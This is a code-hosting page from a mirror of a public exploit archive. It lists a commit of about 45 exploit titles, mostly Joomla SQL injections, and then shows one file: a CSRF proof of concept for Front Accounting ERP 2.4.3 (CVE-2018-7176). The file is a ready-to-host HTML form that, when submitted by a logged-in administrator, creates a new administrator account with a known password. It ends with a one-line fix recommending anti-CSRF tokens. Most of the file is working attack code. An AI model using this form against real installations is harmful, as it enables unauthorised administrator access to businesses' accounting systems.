bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44137.html
Offensive Security ed38447971 DB: 2018-02-17 
45 changes to exploits/shellcodes

Microsoft Edge - 'UnmapViewOfFile' ACG Bypass
JBoss Remoting 6.14.18 - Denial of Service
Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < 4.25 - Denial of Service

ABRT - raceabrt Privilege Escalation(Metasploit)

Joomla! Component Fastball 1.1.0 < 1.2 - SQL Injection
Joomla! Component Fastball 1.1.0 < 1.2 - 'league' SQL Injection

Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
EPIC MyChart - SQL Injection
TV - Video Subscription - Authentication Bypass SQL Injection
UserSpice 4.3 - Blind SQL Injection
Twig < 2.4.4 - Server Side Template Injection
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site Scripting
Joomla! Component Advertisement Board 3.1.0 - 'catname' SQL Injection
Joomla! Component Aist 2.0 - 'id' SQL Injection
Joomla! Component AllVideos Reloaded 1.2.x - 'divid' SQL Injection
Joomla! Component DT Register 3.2.7 - 'id' SQL Injection
Joomla! Component Fastball 2.5 - 'season' SQL Injection
Joomla! Component File Download Tracker 3.0 - SQL Injection
Joomla! Component Form Maker 3.6.12 - SQL Injection
Joomla! Component Gallery WD 1.3.6 - SQL Injection
Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection
Joomla! Component InviteX 3.0.5 - 'invite_type' SQL Injection
Joomla! Component JB Bus 2.3 - 'order_number' SQL Injection
Joomla! Component jGive 2.0.9 - SQL Injection
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection
Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
Joomla! Component JS Autoz 1.0.9 - SQL Injection
Joomla! Component JS Jobs 1.1.9 - SQL Injection
Joomla! Component JTicketing 2.0.16 - SQL Injection
Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection
Joomla! Component NeoRecruit 4.1 - SQL Injection
Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
Joomla! Component Realpin 1.5.04 - SQL Injection
Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
Joomla! Component Solidres 2.5.1 - SQL Injection
Joomla! Component Staff Master 1.0 RC 1 - SQL Injection
Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection
Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection
Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection
Joomla! Component Saxum Astro 4.0.14 - SQL Injection
Joomla! Component Saxum Numerology 3.0.4 - SQL Injection
Joomla! Component SquadManagement 1.0.3 - SQL Injection
Joomla! Component Saxum Picker 3.2.10 - SQL Injection
Front Accounting ERP 2.4.3 - Cross-Site Request Forgery
PHIMS - Hospital Management Information System - 'Password' SQL Injection
PSNews Website 1.0.0 - 'Keywords' SQL Injection
Oracle Primavera P6 Enterprise Project Portfolio Management - HTTP Response Splitting
2018-02-17 05:01:49 +00:00

57 lines
No EOL
1.8 KiB
HTML
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<!--
# Exploit Title: Front Accounting ERP 2.4.3 - CSRF
# Date: 16-02-2018
# Exploit Author: Samrat Das
# Contact: http://twitter.com/Samrat_Das93
# Website: https://securitywarrior9.blogspot.in/
# Vendor Homepage: frontaccounting.com
# Version: 2.4.3
# CVE : CVE-2018-7176
# Category: WebApp ERP
1. Description
The application source code is coded in a way which allows malicious
crafted HTML page to be executed directly without any anti csrf
countermeasures.
2. Proof of Concept
1. Visit the application
2. Visit the User Permissions Page.
3. Goto add user, and create a csrf crafted exploit for the same ,
upon hosting it on a server and sending the link to click by victim, it
gets exploited.
Proof of Concept
Steps to Reproduce:
1. Create an HTML Page with the below exploit code:
-->
<html>
<body>
<form action="
http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml"
method="POST" enctype="text/plain">
<input type="hidden" name="show&#95;inactive"
value="&user&#95;id&#61;Newadmin&password&#61;Newadmin&real&#95;name&#61;New&#37;20Admin&phone&#61;&email&#61;&role&#95;id&#61;8&language&#61;C&pos&#61;1&print&#95;profile&#61;&rep&#95;popup&#61;1&ADD&#95;ITEM&#61;Add&#37;20new&&#95;focus&#61;user&#95;id&&#95;modified&#61;0&&#95;confirmed&#61;&&#95;token&#61;Ta6aiT2xqlL2vg8u9aAvagxx&&#95;random&#61;757897&#46;6552143205"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!--
2 This hosted page upon being clicked by an logged in admin user will lead
to creation of a new malicious admin user.
3 POCs and steps:
https://securitywarrior9.blogspot.in/2018/02/cross-site-request-forgery-front.html
4. Solution:
Implement anti csrf token code in state changing http requests and validate
it at server side.
-->
Reference in a new issue View git blame Copy permalink